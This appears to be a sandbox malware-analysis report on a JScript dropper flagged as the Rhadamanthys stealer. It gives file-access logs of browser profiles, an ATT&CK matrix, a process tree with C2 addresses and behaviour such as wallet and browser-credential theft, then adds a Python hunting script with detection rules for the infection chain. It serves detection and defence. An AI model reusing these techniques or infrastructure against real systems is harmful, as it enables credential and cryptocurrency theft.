Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\safebrowsing\google4
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash11016
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash13043
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash6422
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash4312
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\startupCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash19204
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: Yara match File source: Process Memory Space: svchost.exe PID: 7624, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match File source: 00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.289412154173.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.289410202861.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.289410380457.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.289414206371.0000000003453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\svchost.exe Code function: 27_2_00007DF4586D6448 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,27_2_00007DF4586D6448
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 22 Scripting | 1 Valid Accounts | 31 Windows Management Instrumentation | 22 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Network Service Discovery | Remote Desktop Protocol | 2 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 Create Account | 1 Extra Window Memory Injection | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 13 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 1 Software Packing | NTDS | 257 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 1 Scheduled Task/Job | 14 Windows Service | 11 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 671 Security Software Discovery | SSH | 2 Clipboard Data | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | 12 Service Execution | 1 Scheduled Task/Job | 14 Windows Service | 1 File Deletion | Cached Domain Credentials | 281 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | 3 PowerShell | 31 Registry Run Keys / Startup Folder | 712 Process Injection | 1 Extra Window Memory Injection | DCSync | 2
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                      Scheduled Task/Job
                      1
                      Masquerading
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt31
                      Registry Run Keys / Startup Folder
                      1
                      Valid Accounts
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Modify Registry
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd281
                      Virtualization/Sandbox Evasion
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                      Access Token Manipulation
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers712
                      Process Injection
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Behavior Graph ID 1640931 (rendered here as a process tree)
Sample: 0a0#U00a0.js   Start date: 17/03/2025   Architecture: WINDOWS   Score: 100
Analysis-level network indicators: marchlkalanew6.blogspot.com; kalacpamarchclean.blogspot.com; 17 other IPs or domains
Analysis-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Yara detected RHADAMANTHYS Stealer; 8 other signatures

wscript.exe
  Signatures: JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 3 other signatures
  powershell.exe
    Network: blogspot.l.googleusercontent.com 74.125.138.132:443 (GOOGLEUS, United States; local ports 49806, 49807); bitbucket.org 104.192.142.25:443 (AMAZON-AESUS, United States; local port 49808)
    Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; 4 other signatures
    RegSvcs.exe
      svchost.exe
        Network: 185.208.159.170:2484 (SIMPLECARRER2IT, Switzerland; local ports 49819, 49834)
        Signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); 4 other signatures
        svchost.exe
          Network: ntp1.net.berkeley.edu 169.229.128.134 (UCBUS, United States); ntp.time.nl 94.198.159.10 (SIDNNL, Netherlands); 5 other IPs or domains
          Signatures: Early bird code injection technique detected; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
          wmlaunch.exe
            Dropped: C:\Users\user\AppData\...\goopdate.dll (PE32); C:\Users\user\...\AvastBrowserUpdate.exe (PE32)
            Signatures: Writes to foreign memory regions; Allocates memory in foreign processes
            dllhost.exe
          chrome.exe
            Network: 239.255.255.250 (Reserved)
            chrome.exe
              Network: 127.0.0.1
          msedge.exe
            msedge.exe
              Network: 162.159.61.3:443 (CLOUDFLARENETUS, United States; local ports 49837, 49840); chrome.cloudflare-dns.com 172.64.41.3:443 (CLOUDFLARENETUS, United States; local ports 49835, 49836)
          2 other processes
    MSBuild.exe
      WerFault.exe
      WerFault.exe
    RegSvcs.exe
      dw20.exe
    5 other processes
      dw20.exe
      dw20.exe
  SettingSyncHost.exe
mshta.exe
  Signatures: Suspicious powershell command line found
  powershell.exe
    Network: 64.233.185.132:443 (GOOGLEUS, United States; local ports 49815, 49817)
    conhost.exe
mshta.exe
  powershell.exe
    conhost.exe
6 other processes
  powershell.exe
    conhost.exe
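The part of the graph a detection engineer would turn into hunting logic is the chain wscript.exe spawning powershell.exe, a .NET utility (RegSvcs.exe) spawning svchost.exe, and that svchost.exe connecting out on port 2484. The following is an added example and is not part of the Joe Sandbox report or its tooling: it runs three rules over constructed Sysmon-style events modelled on the tree above and reconstructs the ancestry chain for each hit. The event format, the EXPECTED_SVCHOST_PORTS set, the benign control processes, the 192.0.2.10 endpoint and the port 123 on the NTP connection are assumptions; the process names and the 185.208.159.170:2484 endpoint come from the graph.

```python
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption for this example: the remote ports an svchost.exe-hosted
# service is expected to use on the monitored hosts. Tune per environment.
EXPECTED_SVCHOST_PORTS = {53, 80, 123, 443}


@dataclass(frozen=True)
class ProcEvent:
    """Simplified process-creation record (Sysmon event 1 style)."""
    pid: int
    image: str
    parent_pid: int


@dataclass(frozen=True)
class NetEvent:
    """Simplified network-connection record (Sysmon event 3 style)."""
    pid: int
    dst_ip: str
    dst_port: int


def base(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Image names from the oldest known ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].parent_pid
    return list(reversed(chain))


def hunt(procs, nets):
    """Return (rule, pid, context) tuples for the three behaviours below."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        img = base(p.image)
        parent = by_pid.get(p.parent_pid)
        parent_img = base(parent.image) if parent else ""
        chain = " > ".join(ancestry(p.pid, by_pid))
        # Rule 1: a script host (wscript/cscript/mshta) spawns a shell.
        if parent_img in SCRIPT_HOSTS and img in SHELLS:
            findings.append(("script_host_spawns_shell", p.pid, chain))
        # Rule 2: svchost.exe is started by services.exe on a healthy host;
        # any other parent (here RegSvcs.exe, then svchost itself) is suspect.
        if img == "svchost.exe" and parent_img != "services.exe":
            findings.append(("svchost_unexpected_parent", p.pid, chain))
    for n in nets:
        p = by_pid.get(n.pid)
        # Rule 3: svchost.exe talking to a port outside the expected set.
        if p and base(p.image) == "svchost.exe" and n.dst_port not in EXPECTED_SVCHOST_PORTS:
            chain = " > ".join(ancestry(n.pid, by_pid))
            findings.append(("svchost_nonstandard_port", n.pid,
                             f"{chain} -> {n.dst_ip}:{n.dst_port}"))
    return findings


# Constructed sample telemetry modelled on the report's process tree; pids are
# the graph's node numbers, not real sandbox pids.
SAMPLE_PROCS = [
    ProcEvent(2, r"C:\Windows\explorer.exe", 1),
    ProcEvent(12, r"C:\Windows\System32\wscript.exe", 2),
    ProcEvent(21, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 12),
    ProcEvent(33, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", 21),
    ProcEvent(47, r"C:\Windows\System32\svchost.exe", 33),
    ProcEvent(61, r"C:\Windows\System32\svchost.exe", 47),
    # Benign controls (constructed): a service host with its normal parent
    # and a user-launched shell; neither should produce a finding.
    ProcEvent(700, r"C:\Windows\System32\services.exe", 600),
    ProcEvent(900, r"C:\Windows\System32\svchost.exe", 700),
    ProcEvent(901, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 2),
]
SAMPLE_NETS = [
    NetEvent(47, "185.208.159.170", 2484),  # C2 endpoint and port from the graph
    NetEvent(61, "169.229.128.134", 123),   # NTP server from the graph; port 123 assumed
    NetEvent(900, "192.0.2.10", 443),       # constructed benign HTTPS traffic
]


def demo():
    return hunt(SAMPLE_PROCS, SAMPLE_NETS)


if __name__ == "__main__":
    for rule, pid, ctx in demo():
        print(f"{rule:28} pid={pid:<4} {ctx}")
```

Rule 2 is a heuristic: validate it against a baseline from real hosts before alerting on it, and the expected-port set used by Rule 3 has to be tuned to the environment. The ancestry string is what makes a hit actionable, since it ties the svchost.exe beacon back to the wscript.exe that started the chain.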

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.